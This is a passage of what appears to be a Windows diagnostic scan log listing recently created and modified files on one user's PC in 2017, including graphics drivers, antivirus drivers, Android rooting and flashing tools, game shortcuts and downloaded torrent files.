2017-03-31 09:54 - 2017-03-31 09:54 - 00007736 _____ C:\Users\Mehrad\Downloads\[Doronuma Kyoudai (RED-RUM)] Futa On Dai-Yon Shou _ A Certain Futanari Girl's Masturbation Diary Ch.4 - FutaOna 4 [English] [2d-market.com] [Decensored] [Digital].torrent
2017-03-31 09:35 - 2017-03-31 09:36 - 00008926 _____ C:\Users\Mehrad\Downloads\[Doronuma Kyoudai (RED-RUM)] Futa Ona Dai San Shou _ A Certain Futanari Girl's Masturbation Diary Ch.3_ FutaOna 3 [English] [2d-market.com] [Decensored] [Digital].torrent
2017-03-30 19:24 - 2017-03-30 19:24 - 00000000 ____D C:\Users\Mehrad\AppData\Local\SKIDROW
2017-03-30 19:15 - 2017-03-30 19:15 - 00001944 _____ C:\Users\Mehrad\Desktop\Castle Crashers.lnk
2017-03-30 19:15 - 2017-03-30 19:15 - 00000000 ____D C:\Users\Mehrad\Desktop\Castle.Crashers_YasDL.com
2017-03-30 19:15 - 2017-03-30 19:15 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Castle Crashers
2017-03-30 19:15 - 2017-03-30 19:15 - 00000000 ____D C:\Program Files (x86)\Castle Crashers
2017-03-30 09:46 - 2017-03-30 09:46 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigne8769a7ea74396b6
2017-03-30 09:16 - 2013-05-19 02:02 - 00039168 _____ (Scarlet.Crush Productions) C:\Windows\system32\Drivers\ScpVBus.sys
2017-03-30 09:14 - 2017-04-14 13:14 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\DS4Windows
2017-03-30 09:14 - 2017-03-30 09:16 - 00000000 ____D C:\Users\Mehrad\Desktop\DS4Windows
2017-03-30 08:06 - 2017-04-18 15:00 - 00000000 ____D C:\Users\Mehrad\Desktop\New folder
2017-03-29 19:04 - 2017-03-29 19:04 - 00833024 ____N C:\Windows\system32\tprdpw32.exe
2017-03-29 15:15 - 2017-03-29 15:15 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign72416e4bc88da10f
2017-03-29 15:04 - 2017-03-29 15:04 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign035899e3962d1631
2017-03-29 14:55 - 2017-04-03 00:02 - 45493340 _____ C:\Users\Mehrad\Desktop\T&T.psd
2017-03-29 14:33 - 2017-03-29 14:33 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigncc7bd6a267e6781c
2017-03-29 14:10 - 2017-03-29 14:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5659336330de9c25
2017-03-29 14:02 - 2017-03-29 14:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign82a9019f9b837200
2017-03-29 13:55 - 2017-03-29 13:55 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignc9a5c8205b70314a
2017-03-29 12:44 - 2017-03-29 12:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignb68dc3f2ccbec7ea
2017-03-29 12:17 - 2017-03-29 12:17 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign67f2f3fc1f25e00a
2017-03-29 12:16 - 2017-03-29 12:16 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign7e09904a3583206d
2017-03-29 12:15 - 2017-03-29 12:15 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign54377a990751e2d1
2017-03-28 23:36 - 2016-10-17 20:05 - 00223464 _____ (Tonec Inc.) C:\Windows\system32\Drivers\idmwfp.sys
2017-03-28 23:05 - 2017-03-28 23:05 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign69674e5a181b3249
2017-03-28 21:34 - 2017-03-28 21:34 - 00822776 _____ (COMODO) C:\Windows\system32\Drivers\cmdguard.sys
2017-03-28 21:34 - 2017-03-28 21:34 - 00120472 _____ (COMODO) C:\Windows\system32\Drivers\inspect.sys
2017-03-28 21:34 - 2017-03-28 21:34 - 00042080 _____ (COMODO) C:\Windows\system32\Drivers\cmdhlp.sys
2017-03-28 21:33 - 2017-03-28 21:33 - 00032232 _____ (COMODO) C:\Windows\system32\Drivers\cmderd.sys
2017-03-28 17:55 - 2017-03-28 17:55 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna2596446b8890e0e
2017-03-28 13:55 - 2017-03-28 13:55 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign54638cdee3102aa0
2017-03-28 13:14 - 2017-03-28 13:15 - 00000140 _____ C:\Users\Mehrad\Desktop\Remember.txt
2017-03-28 09:49 - 2017-03-28 09:49 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigndd54f183969b4bcd
2017-03-28 08:13 - 2017-03-28 08:13 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign1d59abd44941c166
2017-03-28 08:07 - 2017-03-28 08:07 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign17a938402e9334ee
2017-03-28 07:42 - 2017-03-28 07:42 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign20a2714522146368
2017-03-28 07:36 - 2017-03-28 07:36 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignb70e46887b17ae24
2017-03-28 07:36 - 2017-03-28 07:36 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign8b023b425d0c0230
2017-03-28 07:36 - 2017-03-28 07:36 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign89ffcf051fb6d9f8
2017-03-27 17:55 - 2017-03-27 17:58 - 09750746 _____ C:\Users\Mehrad\Downloads\weather-release.apk
2017-03-27 17:54 - 2017-03-27 17:54 - 00419830 _____ C:\Users\Mehrad\Downloads\com.sonymobile.xperiaxlivewallpaper_1.0.A.0.28-2097180_minAPI24(nodpi)_apkmirror.com.apk
2017-03-27 17:31 - 2017-03-27 17:37 - 07972294 _____ C:\Users\Mehrad\Downloads\SystemUI.apk
2017-03-27 17:09 - 2016-09-01 16:09 - 03164661 _____ C:\Windows\system32\recovery.twrp.cpio.lzma
2017-03-27 17:09 - 2016-09-01 16:09 - 01479680 _____ C:\Windows\system32\adb.exe
2017-03-27 17:09 - 2016-09-01 16:09 - 00796788 _____ C:\Windows\system32\busybox
2017-03-27 17:09 - 2016-09-01 16:09 - 00097792 _____ (Google, inc) C:\Windows\system32\AdbWinApi.dll
2017-03-27 17:09 - 2016-09-01 16:09 - 00062976 _____ (Google, inc) C:\Windows\system32\AdbWinUsbApi.dll
2017-03-27 17:09 - 2016-09-01 16:09 - 00059808 _____ C:\Windows\system32\modulecrcpatch
2017-03-27 17:09 - 2016-09-01 16:09 - 00034473 _____ C:\Windows\system32\wp_mod.ko
2017-03-27 17:09 - 2016-09-01 16:09 - 00032068 _____ C:\Windows\system32\byeselinux.ko
2017-03-27 17:09 - 2016-09-01 16:09 - 00027288 _____ C:\Windows\system32\iovyroot
2017-03-27 17:09 - 2016-09-01 16:09 - 00004447 _____ C:\Windows\system32\install_twrp_recovery.sh
2017-03-27 17:09 - 2016-09-01 16:09 - 00003022 _____ C:\Windows\system32\chargemon.sh
2017-03-27 17:09 - 2016-09-01 16:09 - 00002164 _____ C:\Windows\system32\boot_twrp_recovery.sh
2017-03-27 17:05 - 2017-03-27 17:05 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Flashtool
2017-03-27 17:04 - 2017-03-27 17:05 - 04494324 _____ C:\Users\Mehrad\Desktop\Recovery_for_MM575-291v5.zip
2017-03-27 13:10 - 2017-03-27 13:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignb793848f5170db92
2017-03-27 13:10 - 2017-03-27 13:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign4ac0543179fcbc30
2017-03-27 13:10 - 2017-03-27 13:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign41d998992247d653
2017-03-27 08:51 - 2017-03-27 08:51 - 00000957 _____ C:\Users\Mehrad\Desktop\Rocket League Triton.lnk
2017-03-27 08:51 - 2017-03-27 08:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rocket League Triton
2017-03-27 01:02 - 2017-03-27 01:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignace43a9a615ca2a9
2017-03-27 01:02 - 2017-03-27 01:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign973ead201cef5fe7
2017-03-27 01:02 - 2017-03-27 01:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign8d8d34c0f11a45dc
2017-03-27 00:52 - 2017-03-27 00:52 - 00001011 _____ C:\Users\Mehrad\Desktop\Steam.lnk
2017-03-26 17:15 - 2017-03-26 17:15 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna3aedca0f6479b79
2017-03-26 17:15 - 2017-03-26 17:15 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign6a0d04c7afc67c08
2017-03-26 17:15 - 2017-03-26 17:15 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign288fc249b25ed7e0
2017-03-26 17:10 - 2017-03-26 17:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignf8b8fb4e549dc6b7
2017-03-26 17:10 - 2017-03-26 17:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign36f0f01056c7b74f
2017-03-26 17:10 - 2017-03-26 17:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign21b37be106ff235e
2017-03-26 17:05 - 2017-03-26 17:05 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignec3c67972fc336a9
2017-03-26 17:05 - 2017-03-26 17:05 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigne0a1fcb84bda2ea9
2017-03-26 17:05 - 2017-03-26 17:05 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign74afd8bc92f77dc7
2017-03-26 17:02 - 2017-03-26 17:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\NVIDIA Corporation
2017-03-26 17:01 - 2017-03-26 17:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\NVIDIA
2017-03-26 17:01 - 2014-01-21 05:54 - 01179576 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2017-03-26 17:01 - 2014-01-21 05:54 - 01048152 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2017-03-26 17:00 - 2017-03-26 17:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-03-26 17:00 - 2017-03-26 17:00 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
2017-03-26 16:59 - 2014-01-24 10:57 - 06676768 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2017-03-26 16:59 - 2014-01-24 10:57 - 03563183 _____ C:\Windows\system32\nvcoproc.bin
2017-03-26 16:59 - 2014-01-24 10:57 - 03496224 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2017-03-26 16:59 - 2014-01-24 10:57 - 02559776 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2017-03-26 16:59 - 2014-01-24 10:57 - 01070368 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2017-03-26 16:59 - 2014-01-24 10:57 - 00922912 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
2017-03-26 16:59 - 2014-01-24 10:57 - 00602912 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\oemdspif.dll
2017-03-26 16:59 - 2014-01-24 10:57 - 00386336 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2017-03-26 16:59 - 2014-01-24 10:57 - 00067072 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2017-03-26 16:59 - 2014-01-24 10:57 - 00063776 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2017-03-26 16:58 - 2013-12-27 21:42 - 00039200 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2017-03-26 16:58 - 2013-12-27 21:42 - 00035104 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2017-03-26 16:58 - 2013-12-27 21:42 - 00033056 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 30385440 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 25258784 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 22971168 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 18313184 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 18224080 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 17560352 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 15878752 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 15231912 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 12661536 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2017-03-26 16:39 - 2014-01-24 11:40 - 11626352 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 11575376 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 09720800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 09678064 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 03138336 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 03130144 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvenc.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 03074752 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 02952992 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 02752800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvenc.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 02701392 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 01884448 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6433250.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 01511712 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6433250.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00887584 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00887072 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00857888 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00853792 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00479520 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00405280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00357152 _____ C:\Windows\system32\NvIFROpenGL.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00314656 _____ C:\Windows\SysWOW64\NvIFROpenGL.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00168616 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00141336 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2017-03-26 16:39 - 2014-01-24 11:40 - 00023754 _____ C:\Windows\system32\nvinfo.pb
2017-03-26 15:59 - 2017-03-26 15:59 - 00000000 ____D C:\temp
2017-03-26 15:45 - 2017-03-26 15:45 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignf3fe81721e2a836a
2017-03-26 15:45 - 2017-03-26 15:45 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5e161b3de9808de2
2017-03-26 15:45 - 2017-03-26 15:45 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign09dc89880fbb2524
2017-03-26 15:44 - 2017-03-26 15:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignf7bc9c5bf1bef513
2017-03-26 15:44 - 2017-03-26 15:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigne64826bc99efe136
2017-03-26 15:43 - 2017-03-26 15:43 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign38f83aafcbb8f2fe
2017-03-26 15:43 - 2017-03-26 15:43 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign33ee55aba36ccd4b
2017-03-26 15:41 - 2017-03-26 15:41 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignd8d5f1c6d8075d35
2017-03-26 15:40 - 2017-03-26 15:40 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigndc5dea5b3cbc99b4
2017-03-26 15:40 - 2017-03-26 15:40 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign9b31da2ffc32b567
2017-03-26 15:40 - 2017-03-26 15:40 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5febf75bb28f2fd1
2017-03-26 13:48 - 2017-03-26 13:48 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignaf3218261930035d
2017-03-26 13:48 - 2017-03-26 13:48 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign41f03fa792c51f28
2017-03-26 13:48 - 2017-03-26 13:48 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign2b95e5401605a1b8
2017-03-26 13:25 - 2017-03-26 13:25 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignc1fdcf17f195b2fa
2017-03-26 13:25 - 2017-03-26 13:25 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign8b5eeae24333f27f
2017-03-26 13:25 - 2017-03-26 13:25 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5e9865bd565a1a3b
2017-03-26 12:21 - 2017-03-26 12:21 - 01174979 _____ C:\Windows\unins001.exe
2017-03-26 12:21 - 2017-03-26 12:21 - 00017943 _____ C:\Windows\unins001.dat
2017-03-26 12:08 - 2017-03-26 12:18 - 00000000 ____D C:\Program Files (x86)\Kingo ROOT
2017-03-26 12:08 - 2017-03-26 12:08 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Kingosoft
2017-03-26 12:08 - 2017-03-26 12:08 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Kingosoft
2017-03-26 12:08 - 2017-03-26 12:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kingo ROOT
2017-03-26 12:05 - 2017-03-26 12:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iRoot
2017-03-26 12:05 - 2017-03-26 12:05 - 00000000 ____D C:\Program Files (x86)\iRoot
2017-03-26 07:06 - 2017-03-26 07:06 - 00007818 _____ C:\Users\Mehrad\Downloads\[Tawara Hiryuu] Tsutawaranai Ai _ Unrequited Love (COMIC Magnum X Vol. 26) [English] {darknight} [Digital].torrent
2017-03-26 06:10 - 2017-03-26 06:28 - 30971680 _____ C:\Users\Mehrad\Downloads\vl_480P_333.0k_7634311.mp4
2017-03-26 05:57 - 2017-03-26 05:57 - 00002203 _____ C:\Users\Public\Desktop\Xperia Companion.lnk
2017-03-26 05:57 - 2017-03-26 05:57 - 00002203 _____ C:\ProgramData\Desktop\Xperia Companion.lnk
2017-03-26 05:57 - 2017-03-26 05:57 - 00000000 ____D C:\Users\Mehrad\Documents\Sony
2017-03-26 05:57 - 2017-03-26 05:57 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Apple Computer
2017-03-26 05:57 - 2017-03-26 05:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sony
2017-03-26 05:57 - 2017-03-26 05:57 - 00000000 ____D C:\Program Files\Sony
2017-03-26 05:57 - 2017-03-26 05:57 - 00000000 ____D C:\Program Files (x86)\Sony
2017-03-26 05:52 - 2017-03-26 05:57 - 49685376 _____ (Sony) C:\Users\Mehrad\AppData\Local\pcc.exe
2017-03-26 05:46 - 2017-03-26 05:48 - 09614711 _____ (Snoop05) C:\Users\Mehrad\Downloads\adb-setup-1.4.3.exe
2017-03-26 05:02 - 2017-03-26 05:02 - 00000000 ____D C:\Users\Mehrad\.swt
2017-03-26 05:02 - 2017-03-26 05:02 - 00000000 ____D C:\Users\Mehrad\.flashTool
2017-03-26 04:52 - 2017-04-24 01:52 - 00000000 ____D C:\Users\Mehrad\Desktop\Woods
2017-03-26 04:42 - 2017-03-26 16:45 - 01031516 _____ C:\Windows\ntbtlog.txt
2017-03-26 04:03 - 2017-03-27 17:05 - 00000000 ____D C:\Flashtool
2017-03-26 03:53 - 2017-03-26 03:54 - 10698165 _____ C:\Users\Mehrad\Downloads\Kernel_Z2_6.0.1_575.ftf
2017-03-26 03:50 - 2017-03-26 03:50 - 09560052 _____ () C:\Users\Mehrad\Downloads\adb-setup-1.3.exe
2017-03-26 03:34 - 2017-03-26 12:05 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\mgyun
2017-03-26 02:30 - 2017-03-26 02:30 - 01002728 _____ (Microsoft Corporation) C:\Windows\system32\WinUSBCoInstaller2.dll
2017-03-26 02:30 - 2017-03-26 02:30 - 00000000 ____D C:\Users\Mehrad\Documents\Wondershare
2017-03-26 02:28 - 2017-03-26 02:28 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\HMYGSetting
2017-03-26 02:27 - 2017-03-26 02:27 - 01179672 _____ C:\Windows\unins000.exe
2017-03-26 02:27 - 2017-03-26 02:27 - 00022823 _____ C:\Windows\unins000.msg
2017-03-26 02:27 - 2017-03-26 02:27 - 00006755 _____ C:\Windows\unins000.dat
2017-03-26 02:27 - 2017-03-26 02:27 - 00000000 ____D C:\ProgramData\wondershare
2017-03-26 02:27 - 2015-02-27 10:35 - 00000232 _____ C:\Windows\SysWOW64\dllhost.exe.config
2017-03-26 02:26 - 2017-03-26 04:45 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Wondershare
2017-03-26 02:26 - 2017-03-26 02:27 - 00000000 ____D C:\Program Files (x86)\Wondershare
2017-03-26 00:13 - 2017-03-26 00:13 - 00419830 _____ C:\Users\Mehrad\Downloads\XperiaXLiveWallpaper-release.apk
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-04-24 18:53 - 2016-08-10 15:21 - 00003594 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-4257933716-793472738-408171945-1001
2017-04-24 18:50 - 2016-08-10 16:18 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Telegram Desktop
2017-04-24 18:48 - 2016-08-10 15:46 - 00000000 ____D C:\ProgramData\NVIDIA
2017-04-24 18:48 - 2013-08-22 19:15 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-24 18:44 - 2016-08-10 15:14 - 00000000 ____D C:\Users\Mehrad
2017-04-24 17:59 - 2016-08-10 16:00 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\DMCache
2017-04-24 17:58 - 2016-11-05 09:18 - 00000000 ____D C:\Users\Mehrad\AppData\Local\CrashDumps
2017-04-24 17:55 - 2013-08-22 17:55 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-04-24 17:38 - 2016-08-16 16:26 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\20SPEED
2017-04-24 17:04 - 2014-11-21 09:14 - 00865408 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-24 17:04 - 2013-08-22 18:06 - 00000000 ____D C:\Windows\Inf
2017-04-24 17:00 - 2016-08-10 15:52 - 00003922 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{E358601D-1006-49C2-9223-FBD4C5911D70}
2017-04-24 16:59 - 2013-08-22 20:06 - 00000000 ____D C:\Windows\system32\NDF
2017-04-24 16:22 - 2016-08-10 16:08 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-24 12:36 - 2016-08-10 16:00 - 00000000 ____D C:\Users\Mehrad\Downloads\Compressed
2017-04-24 05:12 - 2016-08-10 16:00 - 00000000 ____D C:\Users\Mehrad\Downloads\Video
2017-04-24 05:01 - 2016-08-10 16:17 - 00000000 ____D C:\KMPlayer
2017-04-24 04:45 - 2016-12-02 06:02 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\BitTorrent
2017-04-24 02:02 - 2016-11-18 05:36 - 00000000 ____D C:\Program Files\Mozilla Firefox
2017-04-24 02:00 - 2016-08-10 17:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Adobe
2017-04-24 01:52 - 2017-02-17 00:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks
2017-04-24 01:52 - 2016-12-16 15:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CorelDRAW Graphics Suite X6 (64-Bit)
2017-04-24 01:52 - 2016-10-06 22:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft
2017-04-22 23:44 - 2016-08-09 18:57 - 00000000 ____D C:\Users\Mehrad\Downloads\Telegram Desktop
2017-04-18 17:45 - 2016-11-30 18:27 - 00000000 ____D C:\Users\Mehrad\Downloads\1077_God_Eater_Resur
2017-04-18 01:07 - 2017-01-16 03:23 - 00000000 ____D C:\Program Files (x86)\Steam
2017-04-15 11:53 - 2013-08-22 20:06 - 00000000 ____D C:\Windows\AppReadiness
2017-04-15 02:39 - 2017-02-07 04:12 - 00000000 ____D C:\Windows\LastGood
2017-04-15 02:39 - 2016-08-10 15:28 - 00000000 ____D C:\Windows\SysWOW64\RTCOM
2017-04-15 02:36 - 2016-08-10 16:00 - 00000000 ____D C:\Program Files (x86)\Internet Download Manager
2017-04-15 02:35 - 2016-08-10 15:27 - 00000000 ___HD C:\Program Files (x86)\Temp
2017-04-15 02:13 - 2016-09-07 04:29 - 00000000 ____D C:\Users\Mehrad\AppData\Local\ElevatedDiagnostics
2017-04-14 23:04 - 2016-10-15 03:52 - 00000000 ____D C:\Users\Default\AppData\Local\LogMeIn Hamachi
2017-04-14 23:04 - 2016-10-15 03:52 - 00000000 ____D C:\Users\Default User\AppData\Local\LogMeIn Hamachi
2017-04-12 17:45 - 2016-08-10 15:30 - 00000000 ____D C:\Users\Mehrad\Documents\My Bluetooth
2017-04-12 00:45 - 2017-03-18 05:16 - 00000000 ____D C:\Users\Mehrad\Documents\3dsMax
2017-04-09 04:59 - 2016-12-11 18:46 - 00000028 _____ C:\Users\Mehrad\AppData\Roaming\kulerdata.json
2017-04-08 17:21 - 2016-08-10 15:20 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-04-08 17:20 - 2017-01-27 05:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\THQ
2017-04-08 16:50 - 2017-02-25 14:32 - 00000000 ____D C:\Users\Mehrad\Documents\111
2017-04-08 16:48 - 2016-11-20 19:56 - 00004608 _____ C:\Users\Mehrad\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-04-08 16:48 - 2016-11-03 13:29 - 00000000 ____D C:\Users\Mehrad\Documents\Camtasia Studio
2017-04-06 01:39 - 2016-10-01 04:22 - 00002393 ____H C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-05 22:55 - 2016-08-10 15:14 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Adobe
2017-04-02 10:29 - 2017-03-24 05:55 - 00000000 ____D C:\Users\Mehrad\Downloads\111
2017-04-02 10:24 - 2016-08-10 16:55 - 00000000 ____D C:\ProgramData\Smith Micro
2017-04-01 18:55 - 2016-11-18 23:44 - 00000000 ____D C:\Users\Mehrad\AppData\LocalLow\Mozilla
2017-04-01 18:05 - 2013-08-22 20:06 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-01 18:05 - 2013-08-22 20:06 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-01 17:58 - 2016-08-10 16:00 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\IDM
2017-04-01 09:22 - 2016-10-01 04:22 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Google
